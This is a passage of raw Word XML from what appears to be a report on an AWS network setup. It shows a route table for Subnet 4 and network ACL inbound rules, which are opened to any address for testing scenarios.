            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="442F791A" w14:textId="77777777" w:rsidR="00D871E5" w:rsidRPr="00D77DFE" w:rsidRDefault="00D871E5"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Available IPv4 addresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C45B688"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250</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D871E5" w:rsidRPr="00D77DFE" w14:paraId="5D3F1A5D" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A6067E9" w14:textId="6F98C448" w:rsidR="00D871E5" w:rsidRPr="00D77DFE" w:rsidRDefault="00D871E5" w:rsidP="00324A56">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>IPv6 CI</w:t>
            </w:r>
            <w:r w:rsidR="00445C72" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>DR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F7F2F1C"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Not supported</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1600675B" w14:textId="01404F8E" w:rsidR="00CC5E2A" w:rsidRDefault="00CC5E2A" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56277074" w14:textId="77777777" w:rsidR="006861FD" w:rsidRDefault="006861FD" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="438E59C1" w14:textId="77777777" w:rsidR="006861FD" w:rsidRPr="00D77DFE" w:rsidRDefault="006861FD" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36C679CC" w14:textId="19BAD6B6" w:rsidR="005B655F" w:rsidRPr="00D77DFE" w:rsidRDefault="00D86894" w:rsidP="006861FD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The configuration of the route table in </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>ubnet 4 is shown in Table 4.9.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A76D873" w14:textId="2392C2F7" w:rsidR="006D6EE0" w:rsidRPr="00D77DFE" w:rsidRDefault="006D6EE0" w:rsidP="0092527C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 4.9: Configuration of the Route Table in </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ubnet 4</w:t>
      </w:r>
      <w:r w:rsidR="00512AA9">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4269"/>
        <w:gridCol w:w="4224"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D871E5" w:rsidRPr="00D77DFE" w14:paraId="25C0EF8B" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F8F804B" w14:textId="77777777" w:rsidR="00D871E5" w:rsidRPr="00D77DFE" w:rsidRDefault="00D871E5" w:rsidP="00324A56">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="center" w:pos="2146"/>
              </w:tabs>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Destination</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F39C17F"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Target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D871E5" w:rsidRPr="00D77DFE" w14:paraId="12CAFCCB" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75B26921"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10.0.0.0/16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58781BAF"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Local</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D871E5" w:rsidRPr="00D77DFE" w14:paraId="5352BF0B" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1050A0A9"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0.0.0.0/0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00302D9E"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Internet Gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D871E5" w:rsidRPr="00D77DFE" w14:paraId="315B6223" w14:textId="77777777" w:rsidTr="007B6EB7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2877EF20" w14:textId="77777777"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 xml:space="preserve">Explicit subnet association </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4508" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C1D7698" w14:textId="3C8680A0" w:rsidR="00D871E5" w:rsidRPr="00D77DFE" w:rsidRDefault="00D871E5" w:rsidP="00324A56">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="567"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Subnet_4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="72E251FB" w14:textId="77777777" w:rsidR="00A32ED7" w:rsidRPr="00D77DFE" w:rsidRDefault="00A32ED7" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34F59033" w14:textId="3900C958" w:rsidR="00A32ED7" w:rsidRPr="00D77DFE" w:rsidRDefault="00A32ED7" w:rsidP="00E17F71">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc223521110"/>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="009E776C" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A97520" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security in AWS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
      <w:r w:rsidR="00E07016" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138C828D" w14:textId="5B1CEFED" w:rsidR="008478B2" w:rsidRPr="00D77DFE" w:rsidRDefault="00A32ED7" w:rsidP="00324A56">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">All the subnets </w:t>
      </w:r>
      <w:r w:rsidR="00D42CD4" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>have</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidR="00D86894" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve">configuration of inbound rules and outbound rules for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>Network ACL</w:t>
      </w:r>
      <w:r w:rsidR="00B424B7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> which is important to make restrictions for each subnet, these rules represent firewalls, or Intrusion Prevention System</w:t>
      </w:r>
      <w:r w:rsidR="00D86894" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>, as shown in Table 4.10 and 4.11</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A90B780" w14:textId="504E4DC1" w:rsidR="00A32ED7" w:rsidRPr="00D77DFE" w:rsidRDefault="006D6EE0" w:rsidP="0092527C">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 4.10: </w:t>
      </w:r>
      <w:r w:rsidR="00A32ED7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Inbound </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00A32ED7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ules</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ll </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ubnets</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1282"/>
        <w:gridCol w:w="1275"/>
        <w:gridCol w:w="1284"/>
        <w:gridCol w:w="1278"/>
        <w:gridCol w:w="1280"/>
        <w:gridCol w:w="1351"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A32ED7" w:rsidRPr="00D77DFE" w14:paraId="3686E23C" w14:textId="77777777" w:rsidTr="00A32ED7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31252174" w14:textId="725350D0"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Rule number</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78811F34" w14:textId="1CD36407" w:rsidR="00A32ED7" w:rsidRPr="00D77DFE" w:rsidRDefault="006D6EE0"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T</w:t>
            </w:r>
            <w:r w:rsidR="00A32ED7" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1284" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C96F359" w14:textId="46622D57"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protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1278" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16024EB6" w14:textId="0E018319"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Port range</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1280" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71926A7D" w14:textId="0C489256"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source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1351" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="190C3D77" w14:textId="718D23D2"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Allow/deny</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A32ED7" w:rsidRPr="00D77DFE" w14:paraId="795603B8" w14:textId="77777777" w:rsidTr="00A32ED7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FA1E126" w14:textId="17F23040"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100</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30476857" w14:textId="460DB51D"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 traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1284" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E7A9D0F" w14:textId="323567BC"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278" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00E81EEC" w14:textId="5E5C84DA"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280" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63F6E85F" w14:textId="0E7CD82D"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0.0.0.0/0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1351" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="123D7DE6" w14:textId="4FED1108"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Allow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A32ED7" w:rsidRPr="00D77DFE" w14:paraId="1ECD9AA9" w14:textId="77777777" w:rsidTr="00A32ED7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="73D991FE" w14:textId="4131C6F0"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1275" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CC2A9B1" w14:textId="62A671FC"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w:t>
            </w:r>
            <w:r w:rsidR="00D86894" w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>l</w:t>
            </w:r>
            <w:r w:rsidRPr="00D77DFE">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> traffic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1284" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52F4E535" w14:textId="7814BF67"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278" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="180A107A" w14:textId="2E172CFB"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280" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5526D337" w14:textId="29DA378A"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0.0.0.0/0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1351" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D81B5FA" w14:textId="74A9DA1E"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Deny</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="134D2171" w14:textId="700F1B44" w:rsidR="00B424B7" w:rsidRPr="00D77DFE" w:rsidRDefault="009E63C2" w:rsidP="003F32CC">
      <w:pPr>
        <w:spacing w:before="240" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t>In all subnets, inbound rules allow traffic from any public IP address (0.0.0.0/0), enabling external access for testing purposes.</w:t>
      </w:r>
      <w:r w:rsidR="002914EA" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
        </w:rPr>
        <w:t xml:space="preserve"> This configuration is necessary to prepare and configure the subnets for the testing scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134BB346" w14:textId="6709BEA7" w:rsidR="00A32ED7" w:rsidRPr="00D77DFE" w:rsidRDefault="006D6EE0" w:rsidP="005B655F">
      <w:pPr>
        <w:spacing w:before="240" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 4.11: </w:t>
      </w:r>
      <w:r w:rsidR="00A32ED7" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Outbound </w:t>
      </w:r>
      <w:r w:rsidR="009E63C2" w:rsidRPr="00D77DFE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
